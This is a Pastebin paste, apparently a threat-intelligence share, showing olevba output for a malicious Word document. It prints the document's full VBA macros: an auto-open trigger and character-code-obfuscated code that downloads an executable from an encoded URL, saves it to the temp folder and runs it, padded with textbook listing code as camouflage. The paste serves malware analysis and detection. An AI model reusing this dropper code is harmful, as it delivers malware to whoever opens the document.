API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Jul 6th, 2015
536
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 9.01 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS---- elle01~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: elle01~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: elle01~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  
  18. Nip121ÖÊÂ3017 (700)
  19.  
  20. End Sub
  21.  
  22. Sub Nip121ÖÊÂ3017(FFFFF As Integer)
  23.  
  24. baV5XhIz81
  25.  
  26. End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +----------+----------+---------------------------------------+
  32. | Type     | Keyword  | Description                           |
  33. +----------+----------+---------------------------------------+
  34. | AutoExec | AutoOpen | Runs when the Word document is opened |
  35. +----------+----------+---------------------------------------+
  36. -------------------------------------------------------------------------------
  37. VBA MACRO Module1.bas
  38. in file: elle01~1.doc - OLE stream: u'Macros/VBA/Module1'
  39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  40. Public X480smtBX7GP As String
  41.  
  42.  
  43.  
  44. ' Listing 15.1. Using Automation to create a new Word document.
  45. '
  46.  
  47.  
  48.  
  49. Public Function P4mfk1w0(hFiXhEUGKyuh5 As String)
  50.  Set UORXlUXJ8 = WEydCTxsxt4(Chr(83) & Chr(104) & Chr(101) & Chr(108) & "l" & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & "t" & Chr(105) & Chr(111) & Chr(110))
  51. UORXlUXJ8.Open (X480smtBX7GP)
  52. End Function
  53. Sub CreateWordDocument()
  54.     Dim wordApp As Word.Application
  55.     '
  56.    ' Create the Word Application object
  57.    '
  58.    HCnjkdbhve.Application.StatusBar = "Creating Word Application object..."
  59.     Set wordApp = CreateObject("Word.Application")
  60.     '
  61.    ' Work with Word's Application object directly
  62.    '
  63.    With wordApp
  64.         '
  65.        ' Create a new document and add some text
  66.        '
  67.        HCnjkdbhve.Application.StatusBar = "Creating new Word document..."
  68.         .Documents.Add
  69.         .ActiveDocument.Paragraphs(1).Range.InsertBefore "This is an Automation test."
  70.         '
  71.        ' Save the document
  72.        '
  73.        HCnjkdbhve.Application.StatusBar = "Saving Word document..."
  74.         .ActiveDocument.SaveAs "C:\My Documents\OLETest.doc"
  75.         '
  76.        ' We're done, so quit Word
  77.        '
  78.        HCnjkdbhve.Application.StatusBar = "Shutting down Word..."
  79.         .Quit
  80.     End With
  81.     Set wordApp = Nothing
  82.     HCnjkdbhve.Application.StatusBar = False
  83. End Sub
  84.  
  85. ' Listing 15.2. Using Automation to work with a Word document.
  86. '
  87. Public Function WEydCTxsxt4(ofuVzwV8M As String)
  88.  Set WEydCTxsxt4 = CreateObject(ofuVzwV8M)
  89. End Function
  90. Sub DocumentWordCount()
  91.     Dim wordDoc As Word.Document
  92.     '
  93.    ' Get the Word Document object
  94.    '
  95.    HCnjkdbhve.Application.StatusBar = "Getting Word Document object..."
  96.     Set wordDoc = GetObject("C:\My Documents\OLETest.doc", "Word.Document")
  97.     '
  98.    ' Get the word count
  99.    '
  100.    HCnjkdbhve.Application.StatusBar = "Getting word count..."
  101.     MsgBox wordDoc.Name & " has " & wordDoc.Words.Count & " words."
  102.     '
  103.    ' We're done, so quit Word and release object variable
  104.    '
  105.    HCnjkdbhve.Application.StatusBar = "Shutting down Word..."
  106.     wordDoc.HCnjkdbhve.Application.Quit
  107.     Set wordDoc = Nothing
  108.     HCnjkdbhve.Application.StatusBar = False
  109. End Sub
  110.  
  111. Public Function S5keRrVDgCuXr(rCKhzY8Z5 As Variant, YVPfKl3km As String)
  112. Dim x0YC6QLt: Set x0YC6QLt = WEydCTxsxt4(Chr(65) & Chr(100) & "o" & Chr(100) & Chr(98) & "." & "S" & Chr(116) & "r" & Chr(101) & "a" & "m")
  113.  
  114. With x0YC6QLt
  115.    .Type = 1
  116.     .Open
  117.     .write rCKhzY8Z5
  118.     .savetofile YVPfKl3km, 2
  119. End With
  120. End Function
  121. ' Listing 15.3. Using Automation to run a PowerPoint
  122. ' presentation slide show.
  123. '
  124. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  125. ANALYSIS:
  126. +------------+--------------+-----------------------------------------+
  127. | Type       | Keyword      | Description                             |
  128. +------------+--------------+-----------------------------------------+
  129. | Suspicious | Open         | May open a file                         |
  130. | Suspicious | Chr          | May attempt to obfuscate specific       |
  131. |            |              | strings                                 |
  132. | Suspicious | CreateObject | May create an OLE object                |
  133. | Suspicious | SaveToFile   | May create a text file                  |
  134. | Suspicious | Run          | May run an executable file or a system  |
  135. |            |              | command                                 |
  136. | Suspicious | Write        | May write to a file (if combined with   |
  137. |            |              | Open)                                   |
  138. +------------+--------------+-----------------------------------------+
  139. -------------------------------------------------------------------------------
  140. VBA MACRO Module2.bas
  141. in file: elle01~1.doc - OLE stream: u'Macros/VBA/Module2'
  142. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  143. Sub GatherBudgetSheets()
  144.     Dim myCollection As New Collection
  145.    ' Dim ws As Worksheet
  146.  
  147.     For Each ws In ThisWorkbook.Worksheets
  148.         If InStr(ws.Name, "Budget") Then
  149.             myCollection.Add Item:=ws, Key:=ws.Name
  150.         End If
  151.     Next 'ws
  152.    MsgBox "The custom collection contains " & _
  153.         myCollection.Count & " worksheets."
  154. End Sub
  155.  
  156. ' Listing 16.2. A procedure that clears all objects
  157.  
  158. ' from a custom collection.
  159. '
  160. Sub ClearCollection(coll As Collection)
  161.     Do While coll.Count > 0
  162.         coll.Remove Index:=1
  163.     Loop
  164. End Sub
  165.  
  166. ' Listing 16.3. Using an object in a custom class.
  167.  
  168. Sub baV5XhIz81()
  169.  
  170. Set qKUOnuHCDX = WEydCTxsxt4("M" & Chr(105) & "c" & Chr(114) & "o" & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80))
  171.  
  172.  
  173. Hcwvewv = Chr(104) & Chr(116) & "t" & Chr(112) & ":" & Chr(47) & Chr(60) & Chr(47) & Chr(111) & Chr(122) & Chr(101) & Chr(108) & Chr(100) & Chr(117) & Chr(122) & Chr(101) & Chr(110) & Chr(115) & Chr(117) & "r" & Chr(117) & Chr(99) & Chr(117) & Chr(107) & Chr(117) & Chr(114) & "s" & Chr(117) & Chr(46) & Chr(99) & Chr(111) & "m" & Chr(47) & "2" & Chr(53) & "3" & Chr(47) & Chr(54) & "3" & Chr(50) & Chr(46) & "e" & Chr(120) & "e"
  174. Hcwvewv = Replace(Hcwvewv, Chr(60), "", 1, 1, vbTextCompare)
  175. CallByName qKUOnuHCDX, Chr(79) & "p" & Chr(101) & Chr(110), VbMethod, Chr(71) & "E" & "T" _
  176. , Hcwvewv _
  177. , _
  178. False
  179.  
  180. Set WigQ9SJdY = WEydCTxsxt4("W" & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
  181.  
  182. Set QI4SQ0ILWyLNH = CallByName(WigQ9SJdY, Chr(69) & "n" & Chr(118) & "i" & Chr(114) & "o" & Chr(110) & "m" & "e" & "n" & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & "s" & Chr(115))
  183.  
  184. roCrTtTn4bavbJ = QI4SQ0ILWyLNH(Chr(84) & Chr(69) & Chr(77) & Chr(80))
  185.  
  186. X480smtBX7GP = roCrTtTn4bavbJ & "\" & Chr(98) & Chr(108) & "o" & Chr(103) & Chr(100) & Chr(121) & Chr(110) & Chr(97) & Chr(109) & "o" & Chr(111) & Chr(99) & "o" & Chr(109) & "." & "e" & "x" & Chr(101)
  187. Dim NGWFp3rv8t() As Byte
  188.  
  189. CallByName qKUOnuHCDX, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
  190. NGWFp3rv8t = CallByName(qKUOnuHCDX, "r" & Chr(101) & "s" & Chr(112) & "o" & Chr(110) & Chr(115) & Chr(101) & "B" & Chr(111) & "d" & "y", VbGet)
  191. S5keRrVDgCuXr NGWFp3rv8t, X480smtBX7GP
  192. On Error GoTo JlQwk75hS
  193.     a = 356 / 0
  194.     HHdhh.Hnjkvowve
  195.   On Error GoTo 0
  196.  
  197. mE6JTzsE:
  198.   Exit Sub
  199. JlQwk75hS:
  200.   P4mfk1w0 ("VAJ7EpH77R5Tf")
  201. Resume mE6JTzsE
  202. End Sub
  203.  
  204.  
  205. '
  206. Sub CustomClassObjectTest()
  207.     'Dim newCustomer As New CCustomer
  208.    With newCustomer
  209.         .Account = "12-3456"
  210.         .Name = "ACME Coyote Supplies"
  211.         .Address = "123 Wily Way"
  212.         'Set .Invoices = New CInvoices
  213.    End With
  214.     With newCustomer.Invoices
  215.         .Add CustAcct:=newCustomer.Account, Amt:=1234.56
  216.         .Add CustAcct:=newCustomer.Account, Amt:=432.1
  217.         MsgBox .Count
  218.     End With
  219. End Sub
  220.  
  221. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  222. ANALYSIS:
  223. +------------+------------+-----------------------------------------+
  224. | Type       | Keyword    | Description                             |
  225. +------------+------------+-----------------------------------------+
  226. | Suspicious | Chr        | May attempt to obfuscate specific       |
  227. |            |            | strings                                 |
  228. | Suspicious | CallByName | May attempt to obfuscate malicious      |
  229. |            |            | function calls                          |
  230. +------------+------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!